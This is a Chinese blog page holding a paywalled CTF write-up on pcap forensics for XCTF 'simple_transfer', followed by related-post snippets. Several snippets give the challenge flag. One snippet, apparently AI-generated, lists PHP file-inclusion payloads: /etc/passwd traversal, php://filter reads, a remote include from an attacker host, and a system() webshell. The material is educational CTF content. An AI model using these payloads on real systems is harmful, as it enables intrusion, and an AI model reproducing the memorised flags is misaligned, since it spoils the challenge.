【网络安全 | XCTF】simple_transfer

原创 已于 2024-05-31 09:56:09 修改 · 3.8k 阅读 · 10 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #安全

于 2023-12-29 19:46:24 首次发布
本文介绍了在XCTF挑战中如何使用Kali Linux进行网络安全分析,包括通过协议过滤和数据恢复寻找flag,以及解决foremost安装报错的方法。在方法一中,通过分析数据包并执行恢复操作,从PDF中找到flag;方法二中,遇到foremost安装问题,通过更新源解决了找不到包的错误。

考察kali基本工具的使用

方法一

打开文件如图:

在这里插入图片描述
存在较多协议,将协议分级:

在这里插入图片描述
可以看到DLEP协议占比最大:

在这里插入图片描述
将其作为过滤器应用:

在这里插入图片描述
搜索DLEP:

在这里插入图片描述
并没有有利信息,但观察到多数数据包损坏:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
网络安全 | XCTF】2017_Dating_in_Singapore
等风来
12-29 3726
01代表1号 08代表8号 我们就能将其串联起来得到十二个字符。得到十二行,猜测对应一到十二月的日期。
网络安全 | XCTF】Confusion1
等风来
12-29 3469
该题考察SSTI注入。题目描述: 某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)
xctf攻防世界 MISC高手进阶区 simple_transfer
l8947943的博客
01-12 1085
1. 进入环境,下载附件 内容是个pcap文件,果断用wireshark打开 2. 问题分析 使用wireshark找到flag 题目提示,文件里有flag,找到它。那么说明数据流中包含flag,我们使用wireshark中的分组字节流查找flag关键字,如图: 追踪流 上下滑动,翻一翻发现了端倪,如图: 说明文件中有隐藏pdf,因此自然想到了文件分离 foremost文件分离 先安装foremost $ apt-get install foremost 我们使用foremost去分
攻防世界_MISC进阶区_simple_transfer
RuoLi_s的博客
11-11 3300
又做到了一个难缠的题(对于饶了很多弯的我来说、、、呜呜呜) 哎,话不多说了,直接看题吧 我们下载附件,看到是一个抓包分析的题。 第一步当然是直接打开,搜索flag,发现无果, 果断到统计–>协议分级查看: 可以看到,协议的字节百分比占用基本全在NFS协议上,直接过滤NFS 观察报文,发现有个pdf文件 直接foremost分解; 这里是因为文件名太长,我提前给重命名了 打开pdf文件,里面什么都没有, 右键单击,发现又复制图片,所以知道应该是有图片给遮挡住了。 直接CTRL + A 全选,
攻防世界杂项刷题笔记(引导模式)24-待补充
wlmt666的博客
12-13 696
播放动图,发现每一帧都是一个区域,考虑给这几个图片拼在一起看看会发生什么.拼出来是个这个,转而看看这个gif是否存在隐藏文件,这个字母难道是某种密码?最后发现并不是,iscc是比赛平台的名字.文件末尾的 这一串数据非常可疑,直接base64解密是无法解出的.查阅writeup发现,,密钥就是ISCC!需要解密两次扩展:AES特征就是和base64有点像,有+/等字符,是一种对称密码.还没有学那么深刻,等以后强大再继续来看!!!
XCTF MISC 高手区 simple_transfer
duwanglai的博客
01-06 460
simple_transfer 这是一道流量分析题,将pcap文件用foremost分解,得到一个全黑的pdf 编辑pdf,将上层覆盖的图像去掉即可得到flag HITB{b3d0e380e9c39352c667307d010775ca}
XCTF练习题---MISC---simple_transfer
liu914589417的博客
12-25 2369
XCTF练习题—MISC—simple_transfer **flag:HITB{b3d0e380e9c39352c667307d010775ca} ** 解题步骤: 1、观察题目,下载附件 2、经过观察,发现是数据包格式,那果断就来个wireshark分析,打开以后搜索flag,没有任何意义,直接查找协议分级,如下图 3、经过种种分析,最终锁定了NFS协议身上,直接作为过滤器选中,分析NFS协议,经过筛查发现有一个pdf文件,如下图 4、上foremost直接进行分解,得出pdf文件 5、找到位置
网络安全 XCTFsimple_transfer_└─$ sudo apt-get install foremost reading package (1)
2401_84968557的博客
05-13 414
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
XCTF攻防世界MISC--simple_transfer
最新发布
2402_87950092的博客
07-18 190
摘要:在文件分析过程中,发现.pdf文件中嵌入了另一个.pdfforemost文件,通过文件分离技术成功提取出内容,其中包含HITB{b3d0e380e9c39352c667307d010775ca}的字符串标识。
【CTF MISC】XCTF GFSJ0155 simple_transfer Writeup(流量分析+文件提取)
HEX9CF的技术博客
06-05 676
文件里有flag,找到它。
simple_transfer
→_→
12-15 2263
simple_transfer (来源:攻防世界) 1.关卡描述 2.解题步骤 分析: 题目翻译简单的转移,还告诉我们文件里有flag 那么直接使用foremost分离看看有哪些文件能分离出来 分析了一下好像没什么用,我们利用wireshark进行分析 看到了NFS 猜测与其有关,但没什么思路 RST代表验证错误 修复数据包 ============================= 参考资料: 发现有NFS 直接过滤; 发现file.pdf,forem
XCTF simple-unpacked
YenKoc的博客
01-13 291
.查壳 是UPX的壳,拖入IDA,发现很多函数无法反编译也无法查看 二.骚操作 将那个文件放入记事本,ctrl+F搜索flag。 找到了。 实际上,是需要专门的UPX脱壳工具或者手工来脱壳的,我目前能搞得也只会od脱壳,linux的文件,目前我也不咋会。** ...
[CTF-Misc攻防世界]simple_transfer
2302_76688540的博客
05-13 819
发现主要是tcp协议,那我们搜索一下flag。打开文件后是一个流量包,我们去查看一下。文件分开,去打开文件包。
Linux系统下apt install时报错Reading package lists... Done Building dependency
qq_54012756的博客
02-28 4151
linux系统apt install时,报错例如Package 'mlocate' has no installation candidate
XCTFsimple_js
小白渣的博客
09-27 1141
打开之后,直接查看源代码,发现一串JS代码 function dechiffre(pass_enc){ var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65"; var tab = pass_enc.split(','); var tab2 = pass....
【misc | CTF】攻防世界 simple_transfer
weixin_46301214的博客
02-23 1021
查找 .pdf 文件,其实这里思路是比较奇怪的,毕竟是的确比较多内容,慢慢看不现实的。打开就有PDF文件了,但是坑点来了,windows用WPS打开PDF是一片漆黑。拿到流量包,丢进去wireshare,题目都说了flag在里面。我思考了一下有可能是吃经验,以后再碰到这种题型,要学会举一反三。里面可能是 .pdf .png .txt .jpeg 都有可能。这文件很大的,这逻辑明显是错的离谱,那些人真的是废物。但网上wp也很假,就告诉你在里面寻找,只能用kali自带的PDF软件进行查看。
攻防世界-杂项-simple_transfer
weixin_47717433的博客
01-07 3737
攻防世界-杂项-simple_transfer 攻防世界杂项高手进阶区:simple_transfer。此题工具包括:wireshark,binwalk(linux操作系统) 题目 这道题是一个流量分析的题 1.wiresahrk打开附件,此处附上wiresahrk流量分析使用方法wireshark过滤。打开文件如下图所示 打开以后有点乱,于是进行协议分级。(协议分级的作用是统计通信流量中不同协议占比的百分比,看谁占比更多) 协议分级以后发现NFS协议占比94.3%,于是对NFS协议过滤。(NFS是Netw
【攻防世界刷题】Misc-6-simple_transfer
vivishkx的博客
07-31 934
【攻防世界刷题】Misc-6-simple_transfer
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值